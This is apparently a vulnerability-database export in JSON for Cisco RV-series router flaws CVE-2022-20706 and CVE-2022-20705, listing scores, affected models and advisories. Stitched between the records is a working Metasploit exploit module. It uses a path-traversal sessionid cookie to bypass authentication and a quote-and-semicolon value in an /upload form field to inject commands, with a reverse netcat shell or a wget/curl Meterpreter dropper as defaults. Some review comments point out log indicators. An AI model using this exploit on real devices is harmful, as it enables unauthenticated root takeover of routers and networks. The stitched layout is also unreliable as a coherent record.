                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.1,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20706",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20706",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.1,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20706",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20706",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20706",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20706",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20706",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20706",
                "trust": 0.7,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-167",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20706",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20706",
            "trust": 4.0
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-418",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15774",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "id": "VAR-202202-0321",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.286000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=183259"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-418/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20706"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "date": "2023-05-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "date": "2022-02-10T18:15:09.360000",
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-418"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20706"
          },
          {
            "date": "2023-05-08T08:12:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          },
          {
            "date": "2022-02-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          },
          {
            "date": "2024-11-21T06:43:22.427000",
            "db": "NVD",
            "id": "CVE-2022-20706"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004816"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-167"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0325

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: execute arbitrary code; elevate privileges; execute arbitrary commands; bypass authentication and authorization protections; fetch and run unsigned software; cause denial of service (DoS). For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. This access can then be used to pivot to other parts of the network. This module works on firmware versions 1.0.03.24 and below.
}, 'License' => MSF_LICENSE, 'Platform' => ['linux', 'unix'], 'Author' => [ 'Biem Pham', # Vulnerability Discoveries 'Neterum', # Metasploit Module 'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb ], 'DisclosureDate' => '2021-11-02', 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'References' => [ ['CVE', '2022-20705'], # Authentication Bypass ['CVE', '2022-20707'], # Command Injection ['ZDI', '22-410'], # Authentication Bypass ['ZDI', '22-411'] # Command Injection ], 'Targets' => [ [ 'Unix Command', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'Payload' => { 'BadChars' => '\'#' }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], 'Type' => :linux_dropper, 'Payload' => { 'BadChars' => '\'#' }, 'CmdStagerFlavor' => [ 'wget', 'curl' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'MeterpreterTryToFork' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path', '/']) ] ) end

    # Produce the random alphanumeric value sent as the second sessionid cookie.
    #
    # The sessionid used later needs a length of 16 or the request fails; the
    # module author reports testing lengths 14-17.
    #
    # @return [String] 16 random alphanumeric characters
    def generate_session_id
      Rex::Text.rand_text_alphanumeric(16)
    end

    # Probe whether the device shows the authentication-bypass behaviour.
    #
    # A single GET to /upload is sent with two sessionid cookies: the first
    # carries a relative path and the second a random value. A proper "upload"
    # would trigger file creation, so this request is deliberately an incorrect
    # "upload" call that avoids creating a file on disk.
    #
    # Response interpretation (as stated by the module author):
    #   * no response   -> Unknown
    #   * 405           -> authentication was bypassed; the same firmware also
    #                      contains the command injection vulnerability
    #   * 403           -> firmware is not vulnerable
    #   * anything else -> Unknown
    #
    # NOTE(review): a sessionid cookie holding a relative path is not a value a
    # legitimate client sends; presumably it is visible in the device's web
    # server logs, so it is a candidate detection pattern - confirm on a device.
    #
    # @return [CheckCode] assessment derived from the HTTP status code
    def check
      probe_cookie = 'sessionid =../../www/index.html; sessionid=' + generate_session_id
      response = send_request_cgi(
        {
          'method' => 'GET',
          'uri' => '/upload',
          'headers' => { 'Cookie' => probe_cookie }
        },
        10 # second argument: response timeout
      )

      # No answer at all: nothing can be concluded about the firmware.
      return CheckCode::Unknown('The device did not respond to request packet.') if response.nil?

      case response.code
      when 405
        # 405 Not Allowed: the request got past authentication.
        CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
      when 403
        # 403 Forbidden: the request was rejected before reaching the handler.
        CheckCode::Safe('The device is not vulnerable to exploitation.')
      else
        # Catch-all for any other status.
        CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
      end
    end

    # Sends one command through send_exploit and interprets the reply
    # according to the selected target type.
    #
    # cmd   - command string handed to send_exploit.
    # _opts - accepted for interface compatibility; not used here.
    #
    # For the :unix_cmd target only a 403 reply is treated as failure, since
    # the authors note that a successful command shell normally produces no
    # response. For the :linux_dropper target a reply is required, it must be
    # 200 OK, and its body must parse as JSON; otherwise fail_with is called.
    # NOTE(review): the success message is also printed when the :unix_cmd
    # target returns no response at all, so it does not by itself confirm
    # that the command ran.
    def execute_command(cmd, _opts = {})
      response = send_exploit(cmd)

      case target['Type']
      when :unix_cmd
        if response&.code == 403
          fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
        end
      when :linux_dropper
        fail_with(Failure::Unreachable, 'The target did not respond') unless response
        fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless response&.code == 200
        begin
          parsed_body = response.get_json_document
          fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless parsed_body
        rescue JSON::ParserError => err
          print_error("Failed: #{err.class} - #{err.message}")
          fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')
        end
      end

      print_good('Exploit successfully executed.')
    end

    # Builds and sends the multipart POST to /upload that carries the command,
    # and returns whatever send_request_cgi returns (the response, or nil).
    #
    # cmd - command string placed inside the "destination" form field.
    #
    # Log-review note, from what the request contains: a POST to /upload with
    # two "sessionid" cookies (the first holding a "../" path) and a
    # "destination" form field that begins with a quote and semicolon and ends
    # with a "#". The module's own Notes list IOC_IN_LOGS and
    # ARTIFACTS_ON_DISK as side effects.
    def send_exploit(cmd)
      upload_name = Rex::Text.rand_text_alphanumeric(5..12)
      file_param = Rex::Text.rand_text_alphanumeric(5..12)
      file_content = Rex::Text.rand_text_alphanumeric(5..12)

      # Per the module authors the session value must be 16 characters long
      # or the request fails; they report testing lengths 14-17.
      session_value = Rex::Text.rand_text_alphanumeric(16)

      # The authors chose the temporary upload file because the path must
      # exist and be writeable by www-data.
      upload_path = '/tmp/upload.input'
      path_param = 'Configuration'

      # The command is wrapped so that it follows a closing quote and the
      # remainder of the server-side line is commented out.
      destination_value = "'; " + cmd + ' #'

      form = Rex::MIME::Message.new
      [
        [upload_path, 'file.path'],
        [upload_name, 'filename'],
        [path_param, 'pathparam'],
        [file_param, 'fileparam'],
        [destination_value, 'destination']
      ].each do |value, field|
        form.add_part(value, nil, nil, "form-data; name=\"#{field}\"")
      end
      form.add_part(
        file_content,
        'application/octet-stream',
        nil,
        format('form-data; name="input"; filename="%<filename>s"', filename: upload_name)
      )

      # The first cookie value walks out of the "/tmp/upload/" folder, which
      # the authors note holds no other permanent files.
      bypass_cookie = 'sessionid =../../www/index.html; sessionid=' + session_value
      request = {
        'method' => 'POST',
        'uri' => '/upload',
        'ctype' => "multipart/form-data; boundary=#{form.bound}",
        'headers' => { 'Cookie' => bypass_cookie },
        'data' => form.to_s
      }
      send_request_cgi(request, 10)
    end

    # Module entry point: announces the selected target and payload, then
    # dispatches on the target type. :unix_cmd sends the encoded payload as a
    # single command; :linux_dropper hands over to the command stager with a
    # 120-character line limit. Any other type does nothing further.
    def exploit
      print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

      target_type = target['Type']
      if target_type == :unix_cmd
        execute_command(payload.encoded)
      elsif target_type == :linux_dropper
        execute_cmdstager(linemax: 120)
      end
    end
    end # closes the module class, whose opening line is above this excerpt


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0325",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv340",
            "scope": null,
            "trust": 2.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Bien Pham (@bienpnn) from Team Orca of Sea Security (security.sea.com)",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          }
        ],
        "trust": 1.4
      },
      "cve": "CVE-2022-20705",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2022-20705",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20705",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.4,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20705",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20705",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20705",
                "impactScore": null,
                "integrityImpact": "High",
